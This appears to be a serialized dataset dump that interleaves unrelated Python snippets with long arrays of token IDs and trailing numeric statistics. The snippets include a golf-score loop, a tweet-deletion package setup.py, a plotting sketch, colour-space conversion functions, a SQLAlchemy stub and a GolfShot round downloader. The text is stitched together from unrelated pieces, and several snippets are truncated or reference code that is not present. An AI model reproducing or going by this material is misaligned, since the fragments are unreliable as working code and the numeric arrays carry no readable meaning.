26933,
12962,
198,
197,
2,
5460,
379,
15180,
11,
475,
691,
329,
262,
1459,
5752,
198,
197,
1640,
951,
287,
5752,
25,
198,
197,
197,
8516,
58,
72,
4083,
33295,
7,
4033,
8,
198,
197,
2,
804,
379,
5752,
352,
11,
788,
5752,
362,
11,
788,
5752,
513,
1106,
198,
197,
72,
47932,
16,
628,
197,
220,
198,
504,
86,
364,
796,
17635,
198,
76,
16,
796,
12178,
7,
8516,
58,
17,
7131,
1157,
12962,
198,
76,
17,
796,
12178,
7,
8516,
58,
17,
7131,
1157,
12962,
198,
50110,
16,
32,
796,
12178,
7,
8516,
58,
17,
7131,
1157,
12962,
198,
50110,
16,
33,
796,
12178,
7,
8516,
58,
17,
7131,
1157,
12962,
198,
50110,
17,
32,
796,
12178,
7,
8516,
58,
17,
7131,
1157,
12962,
198,
50110,
17,
33,
796,
12178,
7,
8516,
58,
17,
7131,
1157,
12962,
628,
198,
2,
76,
6937,
329,
1123,
6306,
357,
22437,
407,
1487,
266,
14,
11844,
3508,
532,
22638,
422,
14174,
50252,
507,
286,
2604,
7,
50110,
14,
41133,
8,
410,
2604,
7,
35,
577,
8,
1267,
198,
2,
38983,
25,
352,
32,
796,
352,
13,
16,
11,
352,
33,
796,
352,
13,
17,
11,
362,
32,
796,
362,
13,
16,
11,
362,
33,
796,
362,
13,
17,
628,
197,
628,
197,
198,
197,
198,
1640,
5752,
287,
2124,
9521,
7,
17,
11,
1065,
2599,
197,
198,
197,
28311,
25,
198,
197,
197,
76,
16,
796,
12178,
7,
8516,
58,
808,
7131,
23,
12962,
198,
197,
197,
76,
17,
796,
12178,
7,
8516,
58,
808,
7131,
1157,
12962,
198,
197,
197,
50110,
16,
32,
796,
12178,
7,
8516,
58,
808,
7131,
24,
12962,
198,
197,
197,
50110,
17,
32,
796,
12178,
7,
8516,
58,
808,
7131,
1065,
12962,
198,
197,
197,
41133,
16,
32,
796,
352,
12,
50110,
16,
32,
198,
197,
197,
41133,
17,
32,
796,
352,
12,
50110,
17,
32,
198,
197,
197,
197,
198,
197,
197,
8516,
58,
808,
7131,
1415,
60,
796,
16022,
62,
82,
14375,
62,
48553,
7,
50110,
16,
32,
11,
13333,
16,
32,
11,
18350,
17,
32,
11,
13333,
17,
32,
11,
285,
16,
11,
285,
17,
8,
198,
197,
197,
8516,
58,
808,
7131,
1507,
60,
796,
352,
532,
15274,
58,
808,
7131,
1415,
60,
198,
197,
197,
8516,
58,
808,
7131,
1828,
60,
796,
10688,
13,
6404,
7,
8516,
58,
808,
7131,
1507,
60,
14,
8516,
58,
808,
7131,
1415,
60,
837,
940,
8,
198,
197,
16341,
25,
198,
197,
197,
8516,
58,
808,
7131,
1415,
60,
796,
366,
35,
12161,
1,
198,
197,
197,
8516,
58,
808,
7131,
1507,
60,
796,
366,
35,
12161,
1,
198,
197,
197,
8516,
58,
808,
7131,
1828,
60,
796,
366,
35,
12161,
1,
198,
197,
198,
197,
28311,
25,
198,
197,
197,
76,
16,
796,
12178,
7,
8516,
58,
808,
7131,
23,
12962,
198,
197,
197,
76,
17,
796,
12178,
7,
8516,
58,
808,
7131,
1157,
12962,
198,
197,
197,
50110,
16,
32,
796,
12178,
7,
8516,
58,
808,
7131,
24,
12962,
198,
197,
197,
50110,
17,
33,
796,
12178,
7,
8516,
58,
808,
7131,
1485,
12962,
198,
197,
197,
41133,
16,
32,
796,
352,
12,
50110,
16,
32,
198,
197,
197,
41133,
17,
33,
796,
352,
12,
50110,
17,
33,
198,
197,
197,
198,
197,
197,
8516,
58,
808,
7131,
1314,
60,
796,
16022,
62,
82,
14375,
62,
48553,
7,
50110,
16,
32,
11,
13333,
16,
32,
11,
18350,
17,
33,
11,
13333,
17,
33,
11,
285,
16,
11,
285,
17,
8,
198,
197,
197,
8516,
58,
808,
7131,
1129,
60,
796,
352,
532,
15274,
58,
808,
7131,
1314,
60,
198,
197,
197,
8516,
58,
808,
7131,
1954,
60,
796,
10688,
13,
6404,
7,
8516,
58,
808,
7131,
1129,
60,
14,
8516,
58,
808,
7131,
1314,
4357,
940,
8,
198,
197,
16341,
35528,
355,
304,
25,
198,
197,
197,
8516,
58,
808,
7131,
1314,
60,
796,
366,
35,
12161,
1,
198,
197,
197,
8516,
58,
808,
7131,
1129,
60,
796,
366,
35,
12161,
1,
198,
197,
197,
8516,
58,
808,
7131,
1954,
60,
796,
366,
35,
12161,
1,
198,
197,
198,
197,
28311,
25,
198,
197,
197,
76,
16,
796,
12178,
7,
8516,
58,
808,
7131,
23,
12962,
198,
197,
197,
76,
17,
796,
12178,
7,
8516,
58,
808,
7131,
1157,
12962,
198,
197,
197,
50110,
16,
33,
796,
12178,
7,
8516,
58,
808,
7131,
940,
12962,
198,
197,
197,
50110,
17,
32,
796,
12178,
7,
8516,
58,
808,
7131,
1065,
12962,
198,
197,
197,
41133,
16,
33,
796,
352,
12,
50110,
16,
33,
198,
197,
197,
41133,
17,
32,
796,
352,
12,
50110,
17,
32,
198,
197,
197,
198,
197,
197,
2,
5162,
408,
13333,
198,
197,
197,
8516,
58,
808,
7131,
1433,
60,
796,
16022,
62,
82,
14375,
62,
48553,
7,
50110,
16,
33,
11,
13333,
16,
33,
11,
18350,
17,
32,
11,
13333,
17,
32,
11,
285,
16,
11,
285,
17,
8,
198,
197,
197,
2,
5162,
408,
18350,
198,
197,
197,
8516,
58,
808,
7131,
1238,
60,
796,
352,
532,
15274,
58,
808,
7131,
1433,
60,
198,
197,
197,
2,
5162,
408,
11062,
198,
197,
197,
8516,
58,
808,
7131,
1731,
60,
796,
10688,
13,
6404,
7,
8516,
58,
808,
7131,
1238,
60,
14,
8516,
58,
808,
7131,
1433,
4357,
940,
8,
197,
197,
198,
197,
16341,
25,
198,
197,
197,
8516,
58,
808,
7131,
1433,
60,
796,
366,
35,
12161,
1,
198,
197,
197,
8516,
58,
808,
7131,
1238,
60,
796,
366,
35,
12161,
1,
198,
197,
197,
8516,
58,
808,
7131,
1731,
60,
796,
366,
35,
12161,
1,
628,
197,
28311,
25,
198,
197,
197,
76,
16,
796,
12178,
7,
8516,
58,
808,
7131,
23,
12962,
198,
197,
197,
76,
17,
796,
12178,
7,
8516,
58,
808,
7131,
1157,
12962,
198,
197,
197,
50110,
16,
33,
796,
12178,
7,
8516,
58,
808,
7131,
940,
12962,
198,
197,
197,
50110,
17,
33,
796,
12178,
7,
8516,
58,
808,
7131,
1485,
12962,
198,
197,
197,
41133,
16,
33,
796,
352,
12,
50110,
16,
33,
198,
197,
197,
41133,
17,
33,
796,
352,
12,
50110,
17,
33,
198,
197,
197,
198,
197,
197,
8516,
58,
808,
7131,
1558,
60,
796,
16022,
62,
82,
14375,
62,
48553,
7,
50110,
16,
33,
11,
13333,
16,
33,
11,
18350,
17,
33,
11,
13333,
17,
33,
11,
285,
16,
11,
285,
17,
8,
198,
197,
197,
8516,
58,
808,
7131,
2481,
60,
796,
352,
532,
15274,
58,
808,
7131,
1558,
60,
198,
197,
197,
8516,
58,
808,
7131,
1495,
60,
796,
10688,
13,
6404,
7,
8516,
58,
808,
7131,
2481,
60,
14,
8516,
58,
808,
7131,
1558,
4357,
940,
8,
198,
197,
16341,
25,
198,
197,
197,
8516,
58,
808,
7131,
1558,
60,
796,
366,
35,
12161,
1,
198,
197,
197,
8516,
58,
808,
7131,
2481,
60,
796,
366,
35,
12161,
1,
198,
197,
197,
8516,
58,
808,
7131,
1495,
60,
796,
366,
35,
12161,
1,
628,
198,
4480,
1280,
7,
17597,
13,
853,
85,
58,
17,
4357,
366,
39346,
4943,
355,
277,
25,
198,
220,
220,
220,
6260,
796,
269,
21370,
13,
16002,
7,
69,
8,
198,
220,
220,
220,
6260,
13,
16002,
1666,
7,
8516,
8
] | 2.115727 | 1,348 |
#! /usr/bin/env python
from setuptools import find_packages
from setuptools import setup
with open('README.md') as readme_file:
readme = readme_file.read()
setup(
author='Beau Martinez',
classifiers=[
'Programming Language :: Python :: 2.7',
],
description='Delete your tweets and backup tweeted photos to Google Drive.',
entry_points={
'console_scripts': [
'twittercide = twittercide.__main__:main',
],
},
install_requires=[
'arrow==0.4.4',
'python-dateutil>=2.3',
'requests-foauth>=0.1.1',
'requests>=2.5.0',
],
licence='ISC',
long_description=readme,
name='twittercide',
packages=find_packages(),
url='http://github.com/beaumartinez/twittercide',
version='0.1',
)
| [
2,
0,
1220,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
6738,
900,
37623,
10141,
1330,
1064,
62,
43789,
198,
6738,
900,
37623,
10141,
1330,
9058,
628,
198,
4480,
1280,
10786,
15675,
11682,
13,
9132,
11537,
355,
1100,
1326,
62,
7753,
25,
198,
220,
220,
220,
1100,
1326,
796,
1100,
1326,
62,
7753,
13,
961,
3419,
628,
198,
40406,
7,
198,
220,
220,
220,
1772,
11639,
3856,
559,
20741,
3256,
198,
220,
220,
220,
1398,
13350,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
705,
15167,
2229,
15417,
7904,
11361,
7904,
362,
13,
22,
3256,
198,
220,
220,
220,
16589,
198,
220,
220,
220,
6764,
11639,
38727,
534,
12665,
290,
11559,
10830,
5205,
284,
3012,
9974,
2637,
11,
198,
220,
220,
220,
5726,
62,
13033,
34758,
198,
220,
220,
220,
220,
220,
220,
220,
705,
41947,
62,
46521,
10354,
685,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
6956,
66,
485,
796,
17044,
66,
485,
13,
834,
12417,
834,
25,
12417,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
16589,
198,
220,
220,
220,
8964,
198,
220,
220,
220,
2721,
62,
47911,
41888,
198,
220,
220,
220,
220,
220,
220,
220,
705,
6018,
855,
15,
13,
19,
13,
19,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
29412,
12,
4475,
22602,
29,
28,
17,
13,
18,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
8897,
3558,
12,
6513,
18439,
29,
28,
15,
13,
16,
13,
16,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
705,
8897,
3558,
29,
28,
17,
13,
20,
13,
15,
3256,
198,
220,
220,
220,
16589,
198,
220,
220,
220,
17098,
11639,
37719,
3256,
198,
220,
220,
220,
890,
62,
11213,
28,
961,
1326,
11,
198,
220,
220,
220,
1438,
11639,
6956,
66,
485,
3256,
198,
220,
220,
220,
10392,
28,
19796,
62,
43789,
22784,
198,
220,
220,
220,
19016,
11639,
4023,
1378,
12567,
13,
785,
14,
1350,
26043,
433,
18885,
14,
6956,
66,
485,
3256,
198,
220,
220,
220,
2196,
11639,
15,
13,
16,
3256,
198,
8,
198
] | 2.318841 | 345 |
from __future__ import annotations
from typing import Any, Dict, List, Literal, Optional, Union
from .event import Event
from .database import query, queryWithResult, queryWithResults
properties = [
"time",
"position",
"points",
"incomplete",
"event",
"competitor",
"type",
"course",
"id",
"name",
"ageClass",
"club",
"course",
"eventName",
]
| [
6738,
11593,
37443,
834,
1330,
37647,
198,
6738,
19720,
1330,
4377,
11,
360,
713,
11,
7343,
11,
25659,
1691,
11,
32233,
11,
4479,
198,
198,
6738,
764,
15596,
1330,
8558,
198,
6738,
764,
48806,
1330,
12405,
11,
12405,
3152,
23004,
11,
12405,
3152,
25468,
198,
198,
48310,
796,
685,
198,
220,
220,
220,
366,
2435,
1600,
198,
220,
220,
220,
366,
9150,
1600,
198,
220,
220,
220,
366,
13033,
1600,
198,
220,
220,
220,
366,
259,
20751,
1600,
198,
220,
220,
220,
366,
15596,
1600,
198,
220,
220,
220,
366,
5589,
316,
2072,
1600,
198,
220,
220,
220,
366,
4906,
1600,
198,
220,
220,
220,
366,
17319,
1600,
198,
220,
220,
220,
366,
312,
1600,
198,
220,
220,
220,
366,
3672,
1600,
198,
220,
220,
220,
366,
496,
9487,
1600,
198,
220,
220,
220,
366,
18664,
1600,
198,
220,
220,
220,
366,
17319,
1600,
198,
220,
220,
220,
366,
15596,
5376,
1600,
198,
60,
628
] | 2.593548 | 155 |
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# solveData = pd.DataFrame(data = [[1,2,4,8,16,32,64,128],[1,1,2,3,4,3,2,1]], columns=[0,1,2,3,4,5,6,7])
# solveData = solveData.transpose()
# a = [[1,2,3,4],[4,3,2,1,2,3,4,3,2,1]]
# #b= np.array(a)
# c = np.array(a).T
# newData = pd.DataFrame(data = a, columns=[1,2,3,3.5,4,5,6,7,8,9])
# newData = newData.transpose()
# currentData = solveData
# currentData
# currentData = pd.concat([currentData, newData], axis=1, sort=False)
# fig = plt.figure()
# fig.suptitle("pk model")
# ax = fig.add_subplot(1,1,1)
# ax.set_xlabel("Time"+__unitsFormat("s"))
# ax.set_ylabel("Volume"+__unitsFormat("mg"))
# plt.plot(currentData)
# plt.show()
# #def updateData(solveData, newdata)
graph = plot()
graph.adddata([100,50,25,12,6,3,1,0.5],[0,2,3,4,5,6,7,9])
graph.adddata([[1,2,3,5,8,13,21],[15,4,3,2,1,2,3]],[1,2,3,4,5,6,7])
| [
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
19798,
292,
355,
279,
67,
628,
628,
198,
2,
8494,
6601,
796,
279,
67,
13,
6601,
19778,
7,
7890,
796,
16410,
16,
11,
17,
11,
19,
11,
23,
11,
1433,
11,
2624,
11,
2414,
11,
12762,
38430,
16,
11,
16,
11,
17,
11,
18,
11,
19,
11,
18,
11,
17,
11,
16,
60,
4357,
15180,
41888,
15,
11,
16,
11,
17,
11,
18,
11,
19,
11,
20,
11,
21,
11,
22,
12962,
198,
2,
8494,
6601,
796,
8494,
6601,
13,
7645,
3455,
3419,
628,
198,
2,
257,
796,
16410,
16,
11,
17,
11,
18,
11,
19,
38430,
19,
11,
18,
11,
17,
11,
16,
11,
17,
11,
18,
11,
19,
11,
18,
11,
17,
11,
16,
11907,
198,
2,
1303,
65,
28,
45941,
13,
18747,
7,
64,
8,
198,
2,
269,
796,
45941,
13,
18747,
7,
64,
737,
51,
628,
628,
198,
2,
649,
6601,
796,
279,
67,
13,
6601,
19778,
7,
7890,
796,
257,
11,
15180,
41888,
16,
11,
17,
11,
18,
11,
18,
13,
20,
11,
19,
11,
20,
11,
21,
11,
22,
11,
23,
11,
24,
12962,
198,
2,
649,
6601,
796,
649,
6601,
13,
7645,
3455,
3419,
628,
198,
198,
2,
1459,
6601,
796,
8494,
6601,
198,
2,
1459,
6601,
198,
2,
1459,
6601,
796,
279,
67,
13,
1102,
9246,
26933,
14421,
6601,
11,
649,
6601,
4357,
16488,
28,
16,
11,
3297,
28,
25101,
8,
628,
628,
198,
2,
2336,
796,
458,
83,
13,
26875,
3419,
198,
2,
2336,
13,
2385,
457,
2578,
7203,
79,
74,
2746,
4943,
198,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
198,
2,
7877,
796,
2336,
13,
2860,
62,
7266,
29487,
7,
16,
11,
16,
11,
16,
8,
198,
2,
7877,
13,
2617,
62,
87,
18242,
7203,
7575,
1,
10,
834,
41667,
26227,
7203,
82,
48774,
198,
2,
7877,
13,
2617,
62,
2645,
9608,
7203,
31715,
1,
10,
834,
41667,
26227,
7203,
11296,
48774,
628,
198,
198,
2,
458,
83,
13,
29487,
7,
14421,
6601,
8,
198,
2,
458,
83,
13,
12860,
3419,
198,
2,
1303,
4299,
4296,
6601,
7,
82,
6442,
6601,
11,
649,
7890,
8,
628,
198,
198,
34960,
796,
7110,
3419,
198,
34960,
13,
324,
1860,
1045,
26933,
3064,
11,
1120,
11,
1495,
11,
1065,
11,
21,
11,
18,
11,
16,
11,
15,
13,
20,
38430,
15,
11,
17,
11,
18,
11,
19,
11,
20,
11,
21,
11,
22,
11,
24,
12962,
198,
34960,
13,
324,
1860,
1045,
26933,
58,
16,
11,
17,
11,
18,
11,
20,
11,
23,
11,
1485,
11,
2481,
38430,
1314,
11,
19,
11,
18,
11,
17,
11,
16,
11,
17,
11,
18,
60,
38430,
16,
11,
17,
11,
18,
11,
19,
11,
20,
11,
21,
11,
22,
12962,
198
] | 1.9375 | 480 |
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
# def zigzag_indices(shape: (int, int), count):
# x_range, y_range = shape
# index_order = sorted(((x, y) for x in range(x_range) for y in range(y_range)),
# key=lambda p: (p[0] + p[1], -p[1] if (p[0] + p[1]) % 2 else p[1]))
#
# mask = np.zeros(shape)
# for r, c in index_order[:count]:
# mask[r,c] = 1
#
# return mask
def rgb2yuv(image_rgb, image_yuv_out):
""" Transform the image from rgb to yuv """
image_yuv_out[:, 0, :, :] = 0.299 * image_rgb[:, 0, :, :].clone() + 0.587 * image_rgb[:, 1, :, :].clone() + 0.114 * image_rgb[:, 2, :, :].clone()
image_yuv_out[:, 1, :, :] = -0.14713 * image_rgb[:, 0, :, :].clone() + -0.28886 * image_rgb[:, 1, :, :].clone() + 0.436 * image_rgb[:, 2, :, :].clone()
image_yuv_out[:, 2, :, :] = 0.615 * image_rgb[:, 0, :, :].clone() + -0.51499 * image_rgb[:, 1, :, :].clone() + -0.10001 * image_rgb[:, 2, :, :].clone()
def yuv2rgb(image_yuv, image_rgb_out):
""" Transform the image from yuv to rgb """
image_rgb_out[:, 0, :, :] = image_yuv[:, 0, :, :].clone() + 1.13983 * image_yuv[:, 2, :, :].clone()
image_rgb_out[:, 1, :, :] = image_yuv[:, 0, :, :].clone() + -0.39465 * image_yuv[:, 1, :, :].clone() + -0.58060 * image_yuv[:, 2, :, :].clone()
image_rgb_out[:, 2, :, :] = image_yuv[:, 0, :, :].clone() + 2.03211 * image_yuv[:, 1, :, :].clone()
| [
11748,
299,
32152,
355,
45941,
198,
11748,
28034,
198,
11748,
28034,
13,
20471,
355,
299,
77,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
198,
198,
2,
825,
1976,
328,
50183,
62,
521,
1063,
7,
43358,
25,
357,
600,
11,
493,
828,
954,
2599,
198,
2,
220,
220,
220,
220,
2124,
62,
9521,
11,
331,
62,
9521,
796,
5485,
198,
2,
220,
220,
220,
220,
6376,
62,
2875,
796,
23243,
19510,
7,
87,
11,
331,
8,
329,
2124,
287,
2837,
7,
87,
62,
9521,
8,
329,
331,
287,
2837,
7,
88,
62,
9521,
36911,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1994,
28,
50033,
279,
25,
357,
79,
58,
15,
60,
1343,
279,
58,
16,
4357,
532,
79,
58,
16,
60,
611,
357,
79,
58,
15,
60,
1343,
279,
58,
16,
12962,
4064,
362,
2073,
279,
58,
16,
60,
4008,
198,
2,
198,
2,
220,
220,
220,
220,
9335,
796,
45941,
13,
9107,
418,
7,
43358,
8,
198,
2,
220,
220,
220,
220,
329,
374,
11,
269,
287,
6376,
62,
2875,
58,
25,
9127,
5974,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
9335,
58,
81,
11,
66,
60,
796,
352,
198,
2,
198,
2,
220,
220,
220,
220,
1441,
9335,
628,
628,
198,
4299,
46140,
17,
88,
14795,
7,
9060,
62,
81,
22296,
11,
2939,
62,
88,
14795,
62,
448,
2599,
198,
220,
220,
220,
37227,
26981,
262,
2939,
422,
46140,
284,
331,
14795,
37227,
198,
220,
220,
220,
2939,
62,
88,
14795,
62,
448,
58,
45299,
657,
11,
1058,
11,
1058,
60,
796,
657,
13,
22579,
1635,
2939,
62,
81,
22296,
58,
45299,
657,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
657,
13,
44617,
1635,
2939,
62,
81,
22296,
58,
45299,
352,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
657,
13,
16562,
1635,
2939,
62,
81,
22296,
58,
45299,
362,
11,
1058,
11,
1058,
4083,
21018,
3419,
198,
220,
220,
220,
2939,
62,
88,
14795,
62,
448,
58,
45299,
352,
11,
1058,
11,
1058,
60,
796,
532,
15,
13,
20198,
1485,
1635,
2939,
62,
81,
22296,
58,
45299,
657,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
532,
15,
13,
2078,
44980,
1635,
2939,
62,
81,
22296,
58,
45299,
352,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
657,
13,
43690,
1635,
2939,
62,
81,
22296,
58,
45299,
362,
11,
1058,
11,
1058,
4083,
21018,
3419,
198,
220,
220,
220,
2939,
62,
88,
14795,
62,
448,
58,
45299,
362,
11,
1058,
11,
1058,
60,
796,
657,
13,
47007,
1635,
2939,
62,
81,
22296,
58,
45299,
657,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
532,
15,
13,
47396,
2079,
1635,
2939,
62,
81,
22296,
58,
45299,
352,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
532,
15,
13,
3064,
486,
1635,
2939,
62,
81,
22296,
58,
45299,
362,
11,
1058,
11,
1058,
4083,
21018,
3419,
628,
198,
4299,
331,
14795,
17,
81,
22296,
7,
9060,
62,
88,
14795,
11,
2939,
62,
81,
22296,
62,
448,
2599,
198,
220,
220,
220,
37227,
26981,
262,
2939,
422,
331,
14795,
284,
46140,
37227,
198,
220,
220,
220,
2939,
62,
81,
22296,
62,
448,
58,
45299,
657,
11,
1058,
11,
1058,
60,
796,
2939,
62,
88,
14795,
58,
45299,
657,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
352,
13,
1485,
4089,
18,
1635,
2939,
62,
88,
14795,
58,
45299,
362,
11,
1058,
11,
1058,
4083,
21018,
3419,
198,
220,
220,
220,
2939,
62,
81,
22296,
62,
448,
58,
45299,
352,
11,
1058,
11,
1058,
60,
796,
2939,
62,
88,
14795,
58,
45299,
657,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
532,
15,
13,
34626,
2996,
1635,
2939,
62,
88,
14795,
58,
45299,
352,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
532,
15,
13,
39322,
1899,
1635,
2939,
62,
88,
14795,
58,
45299,
362,
11,
1058,
11,
1058,
4083,
21018,
3419,
198,
220,
220,
220,
2939,
62,
81,
22296,
62,
448,
58,
45299,
362,
11,
1058,
11,
1058,
60,
796,
2939,
62,
88,
14795,
58,
45299,
657,
11,
1058,
11,
1058,
4083,
21018,
3419,
1343,
362,
13,
49959,
1157,
1635,
2939,
62,
88,
14795,
58,
45299,
352,
11,
1058,
11,
1058,
4083,
21018,
3419,
628,
628
] | 2.053446 | 711 |
# Generated by Django 2.2 on 2019-04-15 12:47
from django.db import migrations, models
| [
2,
2980,
515,
416,
37770,
362,
13,
17,
319,
13130,
12,
3023,
12,
1314,
1105,
25,
2857,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
628
] | 2.966667 | 30 |
# @Time : 2018-9-10
# @Author : zxh
import os
import tensorflow as tf
import sys
from zutils.utils import relative_project_path
| [
2,
2488,
7575,
220,
220,
1058,
2864,
12,
24,
12,
940,
198,
2,
2488,
13838,
1058,
1976,
87,
71,
198,
11748,
28686,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
11748,
25064,
198,
6738,
1976,
26791,
13,
26791,
1330,
3585,
62,
16302,
62,
6978,
628,
628,
628
] | 2.87234 | 47 |
# based on https://realpython.com/python-sqlite-sqlalchemy/#using-flat-files-for-data-storage
from datetime import datetime
import sqlalchemy
from sqlalchemy import Column, String, Boolean, Integer, Float, Date, DateTime, ForeignKey, select, func, cast
from sqlalchemy.exc import NoResultFound
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, backref, object_session
from otter.database import engine
# from otter.database import session as sess
from otter.util.cli import project_task_abbrev
from otter.util.date import datetime_to_time_string, date_string_to_date
Base = declarative_base()
# cached Odoo objects
# class BaseMixin(Base):
# @classmethod
# def create(cls, **kw):
# obj = cls(**kw)
# # TODO: That's so ugly
# session = sess()
# session.add(obj)
# session.commit()
# Otter objects
Base.metadata.create_all(engine())
| [
2,
1912,
319,
3740,
1378,
5305,
29412,
13,
785,
14,
29412,
12,
25410,
578,
12,
25410,
282,
26599,
31113,
3500,
12,
38568,
12,
16624,
12,
1640,
12,
7890,
12,
35350,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
198,
11748,
44161,
282,
26599,
198,
6738,
44161,
282,
26599,
1330,
29201,
11,
10903,
11,
41146,
11,
34142,
11,
48436,
11,
7536,
11,
7536,
7575,
11,
8708,
9218,
11,
2922,
11,
25439,
11,
3350,
198,
6738,
44161,
282,
26599,
13,
41194,
1330,
1400,
23004,
21077,
198,
6738,
44161,
282,
26599,
13,
2302,
13,
32446,
283,
876,
1330,
2377,
283,
876,
62,
8692,
198,
6738,
44161,
282,
26599,
13,
579,
1330,
2776,
11,
736,
5420,
11,
2134,
62,
29891,
198,
198,
6738,
30972,
353,
13,
48806,
1330,
3113,
198,
2,
422,
30972,
353,
13,
48806,
1330,
6246,
355,
264,
408,
198,
6738,
30972,
353,
13,
22602,
13,
44506,
1330,
1628,
62,
35943,
62,
397,
4679,
85,
198,
6738,
30972,
353,
13,
22602,
13,
4475,
1330,
4818,
8079,
62,
1462,
62,
2435,
62,
8841,
11,
3128,
62,
8841,
62,
1462,
62,
4475,
198,
198,
14881,
796,
2377,
283,
876,
62,
8692,
3419,
628,
198,
2,
39986,
10529,
2238,
5563,
628,
198,
2,
1398,
7308,
35608,
259,
7,
14881,
2599,
198,
2,
220,
220,
220,
220,
2488,
4871,
24396,
198,
2,
220,
220,
220,
220,
825,
2251,
7,
565,
82,
11,
12429,
46265,
2599,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
26181,
796,
537,
82,
7,
1174,
46265,
8,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
16926,
46,
25,
1320,
338,
523,
13400,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
6246,
796,
264,
408,
3419,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
6246,
13,
2860,
7,
26801,
8,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
6246,
13,
41509,
3419,
628,
628,
198,
198,
2,
19740,
353,
5563,
628,
628,
198,
14881,
13,
38993,
13,
17953,
62,
439,
7,
18392,
28955,
198
] | 2.837349 | 332 |
#!/usr/bin/python
import argparse
from bs4 import BeautifulSoup
from html.parser import HTMLParser
from lxml import etree
import json
import re
import requests
GOLFSHOT_URL = 'https://play.golfshot.com'
parser = argparse.ArgumentParser(description='Download GolfShot data')
parser.add_argument('username', help='Username for GolfShot account')
parser.add_argument('password', help='Password for GolfShot account')
parser.add_argument('profile_id', help='Profile ID for GolfShot account')
parser.add_argument('--until', help='Download rounds until specified round (by descending date)')
args = parser.parse_args()
with requests.Session() as session:
tokenRequest = session.get(f'{GOLFSHOT_URL}/signin')
parser = etree.HTMLParser()
tree = etree.fromstring(tokenRequest.text, parser)
verificationToken = tree.xpath('//form//input[@name="__RequestVerificationToken"]/@value')[0]
signin = session.post(f'{GOLFSHOT_URL}/signin',
data={'Email': args.username,
'Password': args.password,
'__RequestVerificationToken': verificationToken,
})
download_rounds(session, args.profile_id, args.until)
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
11748,
1822,
29572,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
198,
6738,
27711,
13,
48610,
1330,
11532,
46677,
198,
6738,
300,
19875,
1330,
2123,
631,
198,
11748,
33918,
198,
11748,
302,
198,
11748,
7007,
198,
198,
38,
3535,
37,
9693,
2394,
62,
21886,
796,
705,
5450,
1378,
1759,
13,
70,
4024,
9442,
13,
785,
6,
628,
628,
628,
628,
628,
198,
48610,
796,
1822,
29572,
13,
28100,
1713,
46677,
7,
11213,
11639,
10002,
19709,
28512,
1366,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
29460,
3256,
1037,
11639,
5842,
13292,
329,
19709,
28512,
1848,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
28712,
3256,
1037,
11639,
35215,
329,
19709,
28512,
1848,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
13317,
62,
312,
3256,
1037,
11639,
37046,
4522,
329,
19709,
28512,
1848,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
28446,
3256,
1037,
11639,
10002,
9196,
1566,
7368,
2835,
357,
1525,
31491,
3128,
8,
11537,
198,
22046,
796,
30751,
13,
29572,
62,
22046,
3419,
198,
198,
4480,
7007,
13,
36044,
3419,
355,
6246,
25,
198,
220,
11241,
18453,
796,
6246,
13,
1136,
7,
69,
6,
90,
38,
3535,
37,
9693,
2394,
62,
21886,
92,
14,
12683,
259,
11537,
198,
220,
30751,
796,
2123,
631,
13,
28656,
46677,
3419,
198,
220,
5509,
796,
2123,
631,
13,
6738,
8841,
7,
30001,
18453,
13,
5239,
11,
30751,
8,
198,
220,
19637,
30642,
796,
5509,
13,
87,
6978,
10786,
1003,
687,
1003,
15414,
58,
31,
3672,
2625,
834,
18453,
13414,
2649,
30642,
8973,
14,
31,
8367,
11537,
58,
15,
60,
198,
220,
1051,
259,
796,
6246,
13,
7353,
7,
69,
6,
90,
38,
3535,
37,
9693,
2394,
62,
21886,
92,
14,
12683,
259,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
34758,
6,
15333,
10354,
26498,
13,
29460,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
35215,
10354,
26498,
13,
28712,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
